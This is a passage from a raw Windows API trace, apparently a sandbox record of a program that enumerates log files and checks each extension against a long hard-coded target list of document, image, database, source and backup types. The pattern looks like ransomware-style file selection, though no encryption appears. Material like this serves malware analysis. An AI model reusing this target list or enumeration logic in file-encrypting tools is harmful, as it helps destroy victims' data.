ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0045.554] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0045.554] lstrlenW (lpString=".1cd") returned 4 [0045.554] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0045.554] lstrlenW (lpString=".3ds") returned 4 [0045.554] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0045.554] lstrlenW (lpString=".3fr") returned 4 [0045.554] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0045.554] lstrlenW (lpString=".3g2") returned 4 [0045.554] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0045.554] lstrlenW (lpString=".3gp") returned 4 [0045.554] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0045.554] lstrlenW (lpString=".7z") returned 3 [0045.554] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0045.554] lstrlenW (lpString=".accda") returned 6 [0045.554] lstrcmpiW (lpString1=".accda", lpString2="66.log") returned -1 [0045.554] lstrlenW (lpString=".accdb") returned 6 [0045.554] lstrcmpiW (lpString1=".accdb", lpString2="66.log") returned -1 [0045.554] lstrlenW (lpString=".accdc") returned 6 [0045.554] lstrcmpiW (lpString1=".accdc", lpString2="66.log") returned -1 [0045.554] lstrlenW (lpString=".accde") returned 6 [0045.554] lstrcmpiW (lpString1=".accde", lpString2="66.log") returned -1 [0045.554] lstrlenW (lpString=".accdt") returned 6 [0045.554] lstrcmpiW (lpString1=".accdt", lpString2="66.log") returned -1 [0045.554] lstrlenW (lpString=".accdw") returned 6 [0045.554] lstrcmpiW (lpString1=".accdw", lpString2="66.log") returned -1 [0045.555] lstrlenW (lpString=".adb") returned 4 [0045.555] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".adp") returned 4 [0045.555] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai") returned 3 [0045.555] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0045.555] lstrlenW (lpString=".ai3") returned 4 [0045.555] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai4") returned 4 [0045.555] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai5") returned 4 [0045.555] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai6") returned 4 [0045.555] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai7") returned 4 [0045.555] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0045.555] lstrlenW (lpString=".ai8") returned 4 [0045.556] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0045.556] lstrlenW (lpString=".anim") returned 5 [0045.556] lstrcmpiW (lpString1=".anim", lpString2="6.log") returned -1 [0045.556] lstrlenW (lpString=".arw") returned 4 [0045.556] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0045.556] lstrlenW (lpString=".as") returned 3 [0045.556] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0045.556] lstrlenW (lpString=".asa") returned 4 [0045.556] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0045.556] lstrlenW (lpString=".asc") returned 4 [0045.556] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0045.556] lstrlenW (lpString=".ascx") returned 5 [0045.556] lstrcmpiW (lpString1=".ascx", lpString2="6.log") returned -1 [0045.556] lstrlenW (lpString=".asm") returned 4 [0045.556] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0045.556] lstrlenW (lpString=".asmx") returned 5 [0045.556] lstrcmpiW (lpString1=".asmx", lpString2="6.log") returned -1 [0045.556] lstrlenW (lpString=".asp") returned 4 [0045.557] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".aspx") returned 5 [0045.557] lstrcmpiW (lpString1=".aspx", lpString2="6.log") returned -1 [0045.557] lstrlenW (lpString=".asr") returned 4 [0045.557] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".asx") returned 4 [0045.557] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".avi") returned 4 [0045.557] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".avs") returned 4 [0045.557] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".backup") returned 7 [0045.557] lstrcmpiW (lpString1=".backup", lpString2="766.log") returned -1 [0045.557] lstrlenW (lpString=".bak") returned 4 [0045.557] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".bay") returned 4 [0045.557] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".bd") returned 3 [0045.557] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0045.557] lstrlenW (lpString=".bin") returned 4 [0045.557] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".bmp") returned 4 [0045.557] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".bz2") returned 4 [0045.557] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".c") returned 2 [0045.557] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0045.557] lstrlenW (lpString=".cdr") returned 4 [0045.557] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".cer") returned 4 [0045.557] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0045.557] lstrlenW (lpString=".cf") returned 3 [0045.557] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0045.558] lstrlenW (lpString=".cfc") returned 4 [0045.558] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cfm") returned 4 [0045.558] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cfml") returned 5 [0045.558] lstrcmpiW (lpString1=".cfml", lpString2="6.log") returned -1 [0045.558] lstrlenW (lpString=".cfu") returned 4 [0045.558] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".chm") returned 4 [0045.558] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cin") returned 4 [0045.558] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".class") returned 6 [0045.558] lstrcmpiW (lpString1=".class", lpString2="66.log") returned -1 [0045.558] lstrlenW (lpString=".clx") returned 4 [0045.558] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".config") returned 7 [0045.558] lstrcmpiW (lpString1=".config", lpString2="766.log") returned -1 [0045.558] lstrlenW (lpString=".cpp") returned 4 [0045.558] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cr2") returned 4 [0045.558] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".crt") returned 4 [0045.558] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".crw") returned 4 [0045.558] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cs") returned 3 [0045.558] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0045.558] lstrlenW (lpString=".css") returned 4 [0045.558] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".csv") returned 4 [0045.558] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0045.558] lstrlenW (lpString=".cub") returned 4 [0045.559] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dae") returned 4 [0045.559] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dat") returned 4 [0045.559] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".db") returned 3 [0045.559] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0045.559] lstrlenW (lpString=".dbf") returned 4 [0045.559] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dbx") returned 4 [0045.559] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dc3") returned 4 [0045.559] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dcm") returned 4 [0045.559] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dcr") returned 4 [0045.559] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".der") returned 4 [0045.559] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dib") returned 4 [0045.559] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dic") returned 4 [0045.559] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".dif") returned 4 [0045.559] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".divx") returned 5 [0045.559] lstrcmpiW (lpString1=".divx", lpString2="6.log") returned -1 [0045.559] lstrlenW (lpString=".djvu") returned 5 [0045.559] lstrcmpiW (lpString1=".djvu", lpString2="6.log") returned -1 [0045.559] lstrlenW (lpString=".dng") returned 4 [0045.559] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".doc") returned 4 [0045.559] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0045.559] lstrlenW (lpString=".docm") returned 5 [0045.559] lstrcmpiW (lpString1=".docm", lpString2="6.log") returned -1 [0045.560] lstrlenW (lpString=".docx") returned 5 [0045.560] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0045.560] lstrlenW (lpString=".dot") returned 4 [0045.560] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dotm") returned 5 [0045.560] lstrcmpiW (lpString1=".dotm", lpString2="6.log") returned -1 [0045.560] lstrlenW (lpString=".dotx") returned 5 [0045.560] lstrcmpiW (lpString1=".dotx", lpString2="6.log") returned -1 [0045.560] lstrlenW (lpString=".dpx") returned 4 [0045.560] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dqy") returned 4 [0045.560] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dsn") returned 4 [0045.560] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dt") returned 3 [0045.560] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0045.560] lstrlenW (lpString=".dtd") returned 4 [0045.560] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dwg") returned 4 [0045.560] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dwt") returned 4 [0045.560] lstrcmpiW (lpString1=".dwt", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".dx") returned 3 [0045.560] lstrcmpiW (lpString1=".dx", lpString2="log") returned -1 [0045.560] lstrlenW (lpString=".dxf") returned 4 [0045.560] lstrcmpiW (lpString1=".dxf", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".edml") returned 5 [0045.560] lstrcmpiW (lpString1=".edml", lpString2="6.log") returned -1 [0045.560] lstrlenW (lpString=".efd") returned 4 [0045.560] lstrcmpiW (lpString1=".efd", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".elf") returned 4 [0045.560] lstrcmpiW (lpString1=".elf", lpString2=".log") returned -1 [0045.560] lstrlenW (lpString=".emf") returned 4 [0045.561] lstrcmpiW (lpString1=".emf", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".emz") returned 4 [0045.561] lstrcmpiW (lpString1=".emz", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".epf") returned 4 [0045.561] lstrcmpiW (lpString1=".epf", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".eps") returned 4 [0045.561] lstrcmpiW (lpString1=".eps", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".epsf") returned 5 [0045.561] lstrcmpiW (lpString1=".epsf", lpString2="6.log") returned -1 [0045.561] lstrlenW (lpString=".epsp") returned 5 [0045.561] lstrcmpiW (lpString1=".epsp", lpString2="6.log") returned -1 [0045.561] lstrlenW (lpString=".erf") returned 4 [0045.561] lstrcmpiW (lpString1=".erf", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".exr") returned 4 [0045.561] lstrcmpiW (lpString1=".exr", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".f4v") returned 4 [0045.561] lstrcmpiW (lpString1=".f4v", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".fido") returned 5 [0045.561] lstrcmpiW (lpString1=".fido", lpString2="6.log") returned -1 [0045.561] lstrlenW (lpString=".flm") returned 4 [0045.561] lstrcmpiW (lpString1=".flm", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".flv") returned 4 [0045.561] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".frm") returned 4 [0045.561] lstrcmpiW (lpString1=".frm", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".fxg") returned 4 [0045.561] lstrcmpiW (lpString1=".fxg", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".geo") returned 4 [0045.561] lstrcmpiW (lpString1=".geo", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".gif") returned 4 [0045.561] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0045.561] lstrlenW (lpString=".grs") returned 4 [0045.561] lstrcmpiW (lpString1=".grs", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".gz") returned 3 [0045.562] lstrcmpiW (lpString1=".gz", lpString2="log") returned -1 [0045.562] lstrlenW (lpString=".h") returned 2 [0045.562] lstrcmpiW (lpString1=".h", lpString2="og") returned -1 [0045.562] lstrlenW (lpString=".hdr") returned 4 [0045.562] lstrcmpiW (lpString1=".hdr", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".hpp") returned 4 [0045.562] lstrcmpiW (lpString1=".hpp", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".hta") returned 4 [0045.562] lstrcmpiW (lpString1=".hta", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".htc") returned 4 [0045.562] lstrcmpiW (lpString1=".htc", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".htm") returned 4 [0045.562] lstrcmpiW (lpString1=".htm", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".html") returned 5 [0045.562] lstrcmpiW (lpString1=".html", lpString2="6.log") returned -1 [0045.562] lstrlenW (lpString=".icb") returned 4 [0045.562] lstrcmpiW (lpString1=".icb", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".ics") returned 4 [0045.562] lstrcmpiW (lpString1=".ics", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".iff") returned 4 [0045.562] lstrcmpiW (lpString1=".iff", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".inc") returned 4 [0045.562] lstrcmpiW (lpString1=".inc", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".indd") returned 5 [0045.562] lstrcmpiW (lpString1=".indd", lpString2="6.log") returned -1 [0045.562] lstrlenW (lpString=".ini") returned 4 [0045.562] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".iqy") returned 4 [0045.562] lstrcmpiW (lpString1=".iqy", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".j2c") returned 4 [0045.562] lstrcmpiW (lpString1=".j2c", lpString2=".log") returned -1 [0045.562] lstrlenW (lpString=".j2k") returned 4 [0045.563] lstrcmpiW (lpString1=".j2k", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".java") returned 5 [0045.563] lstrcmpiW (lpString1=".java", lpString2="6.log") returned -1 [0045.563] lstrlenW (lpString=".jp2") returned 4 [0045.563] lstrcmpiW (lpString1=".jp2", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".jpc") returned 4 [0045.563] lstrcmpiW (lpString1=".jpc", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".jpe") returned 4 [0045.563] lstrcmpiW (lpString1=".jpe", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".jpeg") returned 5 [0045.563] lstrcmpiW (lpString1=".jpeg", lpString2="6.log") returned -1 [0045.563] lstrlenW (lpString=".jpf") returned 4 [0045.563] lstrcmpiW (lpString1=".jpf", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".jpg") returned 4 [0045.563] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".jpx") returned 4 [0045.563] lstrcmpiW (lpString1=".jpx", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".js") returned 3 [0045.563] lstrcmpiW (lpString1=".js", lpString2="log") returned -1 [0045.563] lstrlenW (lpString=".jsf") returned 4 [0045.563] lstrcmpiW (lpString1=".jsf", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".json") returned 5 [0045.563] lstrcmpiW (lpString1=".json", lpString2="6.log") returned -1 [0045.563] lstrlenW (lpString=".jsp") returned 4 [0045.563] lstrcmpiW (lpString1=".jsp", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".kdc") returned 4 [0045.563] lstrcmpiW (lpString1=".kdc", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".kmz") returned 4 [0045.563] lstrcmpiW (lpString1=".kmz", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".kwm") returned 4 [0045.563] lstrcmpiW (lpString1=".kwm", lpString2=".log") returned -1 [0045.563] lstrlenW (lpString=".lasso") returned 6 [0045.564] lstrcmpiW (lpString1=".lasso", lpString2="66.log") returned -1 [0045.564] lstrlenW (lpString=".lbi") returned 4 [0045.564] lstrcmpiW (lpString1=".lbi", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".lgf") returned 4 [0045.564] lstrcmpiW (lpString1=".lgf", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".lgp") returned 4 [0045.564] lstrcmpiW (lpString1=".lgp", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".log") returned 4 [0045.564] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0045.564] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0045.564] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0045.564] lstrlenW (lpString=".1cd") returned 4 [0045.564] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".3ds") returned 4 [0045.564] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".3fr") returned 4 [0045.564] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".3g2") returned 4 [0045.564] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".3gp") returned 4 [0045.564] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0045.564] lstrlenW (lpString=".7z") returned 3 [0045.564] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0045.564] lstrlenW (lpString=".accda") returned 6 [0045.564] lstrcmpiW (lpString1=".accda", lpString2="37.log") returned -1 [0045.564] lstrlenW (lpString=".accdb") returned 6 [0045.564] lstrcmpiW (lpString1=".accdb", lpString2="37.log") returned -1 [0045.564] lstrlenW (lpString=".accdc") returned 6 [0045.564] lstrcmpiW (lpString1=".accdc", lpString2="37.log") returned -1 [0045.564] lstrlenW (lpString=".accde") returned 6 [0045.564] lstrcmpiW (lpString1=".accde", lpString2="37.log") returned -1 [0045.565] lstrlenW (lpString=".accdt") returned 6 [0045.565] lstrcmpiW (lpString1=".accdt", lpString2="37.log") returned -1 [0045.565] lstrlenW (lpString=".accdw") returned 6 [0045.565] lstrcmpiW (lpString1=".accdw", lpString2="37.log") returned -1 [0045.565] lstrlenW (lpString=".adb") returned 4 [0045.565] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".adp") returned 4 [0045.565] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai") returned 3 [0045.565] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0045.565] lstrlenW (lpString=".ai3") returned 4 [0045.565] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai4") returned 4 [0045.565] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai5") returned 4 [0045.565] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai6") returned 4 [0045.565] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai7") returned 4 [0045.565] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ai8") returned 4 [0045.565] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".anim") returned 5 [0045.565] lstrcmpiW (lpString1=".anim", lpString2="7.log") returned -1 [0045.565] lstrlenW (lpString=".arw") returned 4 [0045.565] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".as") returned 3 [0045.565] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0045.565] lstrlenW (lpString=".asa") returned 4 [0045.565] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".asc") returned 4 [0045.565] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0045.565] lstrlenW (lpString=".ascx") returned 5 [0045.565] lstrcmpiW (lpString1=".ascx", lpString2="7.log") returned -1 [0045.566] lstrlenW (lpString=".asm") returned 4 [0045.566] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".asmx") returned 5 [0045.566] lstrcmpiW (lpString1=".asmx", lpString2="7.log") returned -1 [0045.566] lstrlenW (lpString=".asp") returned 4 [0045.566] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".aspx") returned 5 [0045.566] lstrcmpiW (lpString1=".aspx", lpString2="7.log") returned -1 [0045.566] lstrlenW (lpString=".asr") returned 4 [0045.566] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".asx") returned 4 [0045.566] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".avi") returned 4 [0045.566] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".avs") returned 4 [0045.566] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".backup") returned 7 [0045.566] lstrcmpiW (lpString1=".backup", lpString2="737.log") returned -1 [0045.566] lstrlenW (lpString=".bak") returned 4 [0045.566] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".bay") returned 4 [0045.566] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0045.566] lstrlenW (lpString=".bd") returned 3 [0045.566] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0045.567] lstrlenW (lpString=".bin") returned 4 [0045.567] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".bmp") returned 4 [0045.567] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".bz2") returned 4 [0045.567] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".c") returned 2 [0045.567] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0045.567] lstrlenW (lpString=".cdr") returned 4 [0045.567] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cer") returned 4 [0045.567] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cf") returned 3 [0045.567] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0045.567] lstrlenW (lpString=".cfc") returned 4 [0045.567] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cfm") returned 4 [0045.567] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cfml") returned 5 [0045.567] lstrcmpiW (lpString1=".cfml", lpString2="7.log") returned -1 [0045.567] lstrlenW (lpString=".cfu") returned 4 [0045.567] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".chm") returned 4 [0045.567] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cin") returned 4 [0045.567] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".class") returned 6 [0045.567] lstrcmpiW (lpString1=".class", lpString2="37.log") returned -1 [0045.567] lstrlenW (lpString=".clx") returned 4 [0045.567] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".config") returned 7 [0045.567] lstrcmpiW (lpString1=".config", lpString2="737.log") returned -1 [0045.567] lstrlenW (lpString=".cpp") returned 4 [0045.567] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".cr2") returned 4 [0045.567] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0045.567] lstrlenW (lpString=".crt") returned 4 [0045.567] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".crw") returned 4 [0045.568] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".cs") returned 3 [0045.568] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0045.568] lstrlenW (lpString=".css") returned 4 [0045.568] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".csv") returned 4 [0045.568] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".cub") returned 4 [0045.568] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dae") returned 4 [0045.568] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dat") returned 4 [0045.568] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".db") returned 3 [0045.568] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0045.568] lstrlenW (lpString=".dbf") returned 4 [0045.568] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dbx") returned 4 [0045.568] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dc3") returned 4 [0045.568] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dcm") returned 4 [0045.568] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dcr") returned 4 [0045.568] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".der") returned 4 [0045.568] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dib") returned 4 [0045.568] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dic") returned 4 [0045.568] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".dif") returned 4 [0045.568] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0045.568] lstrlenW (lpString=".divx") returned 5 [0045.568] lstrcmpiW (lpString1=".divx", lpString2="7.log") returned -1 [0045.568] lstrlenW (lpString=".djvu") returned 